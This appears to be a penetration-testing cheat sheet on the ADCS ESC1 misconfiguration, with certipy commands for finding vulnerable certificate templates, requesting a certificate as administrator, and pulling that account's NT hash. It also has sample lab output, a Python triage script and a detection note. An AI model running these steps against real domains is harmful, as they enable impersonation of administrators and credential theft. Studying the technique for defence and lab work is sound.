👾 Overview

ESC1 is a common ADCS misconfiguration in which a certificate template grants enrollment rights to low-privileged principals such as Domain Users, lets the enrollee supply the subject (so a subjectAltName can be included in the CSR), and allows client authentication. A requester can therefore obtain a certificate for any principal, such as a Domain Admin.

🔍 Discovery

Certipy is the go-to tool for finding and exploiting many common ADCS misconfigurations.

# Enumerate ADCS vulnerabilities with certipy
certipy-ad find -username [username]@[domain] -password [password] -dc-ip [IP]

Running certipy requires domain user credentials. It generates several output files, including JSON, which can be examined manually or imported into BloodHound.

In the JSON output, certipy will flag a given template as vulnerable:

"1": {
      "Template Name": "CorpVPN",
      "Display Name": "Corp VPN",
      "Certificate Authorities": [
        "AUTHORITY-CA"
      ],
      "Enabled": true,
      "Client Authentication": true,
      "Enrollment Agent": false,
      "Any Purpose": false,
      "Enrollee Supplies Subject": true,
      "Certificate Name Flag": [
        "EnrolleeSuppliesSubject"
      ],
      "Enrollment Flag": [
        "AutoEnrollmentCheckUserDsCertificate",
        "PublishToDs",
        "IncludeSymmetricAlgorithms"
      ],
      "Private Key Flag": [
        "ExportableKey"
      ],
      "Extended Key Usage": [
        "Encrypting File System",
        "Secure Email",
        "Client Authentication",
        "Document Signing",
        "IP security IKE intermediate",
        "IP security use",
        "KDC Authentication"
      ],
      "Requires Manager Approval": false,
      "Requires Key Archival": false,
      "Authorized Signatures Required": 0,
      "Validity Period": "20 years",
      "Renewal Period": "6 weeks",
      "Minimum RSA Key Length": 2048,
      "Permissions": {
        "Enrollment Permissions": {
          "Enrollment Rights": [
            "AUTHORITY.HTB\\Domain Computers",
            "AUTHORITY.HTB\\Domain Admins",
            "AUTHORITY.HTB\\Enterprise Admins"
          ]
        },
        "Object Control Permissions": {
          "Owner": "AUTHORITY.HTB\\Administrator",
          "Write Owner Principals": [
            "AUTHORITY.HTB\\Domain Admins",
            "AUTHORITY.HTB\\Enterprise Admins",
            "AUTHORITY.HTB\\Administrator"
          ],
          "Write Dacl Principals": [
            "AUTHORITY.HTB\\Domain Admins",
            "AUTHORITY.HTB\\Enterprise Admins",
            "AUTHORITY.HTB\\Administrator"
          ],
          "Write Property Principals": [
            "AUTHORITY.HTB\\Domain Admins",
            "AUTHORITY.HTB\\Enterprise Admins",
            "AUTHORITY.HTB\\Administrator"
          ]
        }
      },
      "[!] Vulnerabilities": {
        "ESC1": "'AUTHORITY.HTB\\\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication"
      }
    },
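A small triage script, added here as an example and not part of certipy, that applies the same ESC1 conditions shown in the JSON above (enabled, enrollee supplies subject, client authentication, no manager approval, no extra signatures, enrollment open to a broad group) to a certipy output file. The key names follow the excerpt above, the top-level "Certificate Templates" key and the sample values are assumptions, so a real `certipy-ad find` JSON may need the template path adjusted.

```python
import json

# Constructed sample in the shape of certipy's JSON output (illustrative values,
# not from a real CA); only the keys the ESC1 check needs are kept.
SAMPLE_JSON = """{
  "Certificate Templates": {
    "0": {"Template Name": "CorpVPN", "Enabled": true,
          "Client Authentication": true, "Enrollee Supplies Subject": true,
          "Requires Manager Approval": false, "Authorized Signatures Required": 0,
          "Permissions": {"Enrollment Permissions": {"Enrollment Rights":
            ["CORP.LOCAL\\\\Domain Computers", "CORP.LOCAL\\\\Domain Admins"]}}},
    "1": {"Template Name": "User", "Enabled": true,
          "Client Authentication": true, "Enrollee Supplies Subject": false,
          "Requires Manager Approval": false, "Authorized Signatures Required": 0,
          "Permissions": {"Enrollment Permissions": {"Enrollment Rights":
            ["CORP.LOCAL\\\\Domain Users"]}}},
    "2": {"Template Name": "Approved", "Enabled": true,
          "Client Authentication": true, "Enrollee Supplies Subject": true,
          "Requires Manager Approval": true, "Authorized Signatures Required": 0,
          "Permissions": {"Enrollment Permissions": {"Enrollment Rights":
            ["CORP.LOCAL\\\\Domain Users"]}}}
  }
}"""

# Broad groups whose enrollment rights put a template within reach of any domain principal.
LOW_PRIV_GROUPS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

def low_priv_enrollers(template):
    """Enrollment principals that are broad, low-privileged groups."""
    rights = (template.get("Permissions", {})
                      .get("Enrollment Permissions", {})
                      .get("Enrollment Rights", []))
    return [p for p in rights if p.split("\\")[-1] in LOW_PRIV_GROUPS]

def is_esc1(template):
    """Every ESC1 precondition must hold: enabled, enrollee supplies subject,
    client-auth EKU, no manager approval, no extra signatures, broad enrollment."""
    return (template.get("Enabled") is True
            and template.get("Enrollee Supplies Subject") is True
            and template.get("Client Authentication") is True
            and template.get("Requires Manager Approval") is False
            and template.get("Authorized Signatures Required", 0) == 0
            and bool(low_priv_enrollers(template)))

def find_esc1(raw_json):
    """Map each ESC1-vulnerable template name to the broad groups that can enroll."""
    templates = json.loads(raw_json)["Certificate Templates"].values()
    return {t["Template Name"]: low_priv_enrollers(t) for t in templates if is_esc1(t)}
```

The "User" and "Approved" templates in the sample are deliberately near-misses (no enrollee-supplied subject, manager approval required) so the output shows only the genuinely vulnerable template.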

📌 Exploitation

To exploit this, request a certificate using the vulnerable template and supply the subject you want to impersonate, generally the Administrator account.

# Request certificate
sudo certipy-ad req -username [USERNAME]@[DOMAIN] -password [PASSWORD] -target-ip [IP] -ca '[CA NAME]' -template '[VULNERABLE TEMPLATE NAME]' -upn 'administrator@[DOMAIN]'

This produces the certificate file [USERNAME].pfx, which can be used to authenticate as the impersonated user.

✨ Post-Exploitation

You can use certipy-ad auth to authenticate as the impersonated user and retrieve that account's NT hash:

# Authenticate and get the user's hash
sudo certipy-ad auth -pfx '[USERNAME].pfx' -username '[USERNAME]' -domain '[domain]' -dc-ip [ip]

🚔 Detection & Evasion

Event ID 4887 (Certificate Services approved a certificate request and issued a certificate) is written to the Security log on the CA whenever a certificate is issued. It only appears when Certification Services auditing is enabled on the CA, so confirm that audit setting before relying on it.

📝 Resources

🔗 Hyperlink    ℹ️ Info
SpecterOps      Certified Pre-Owned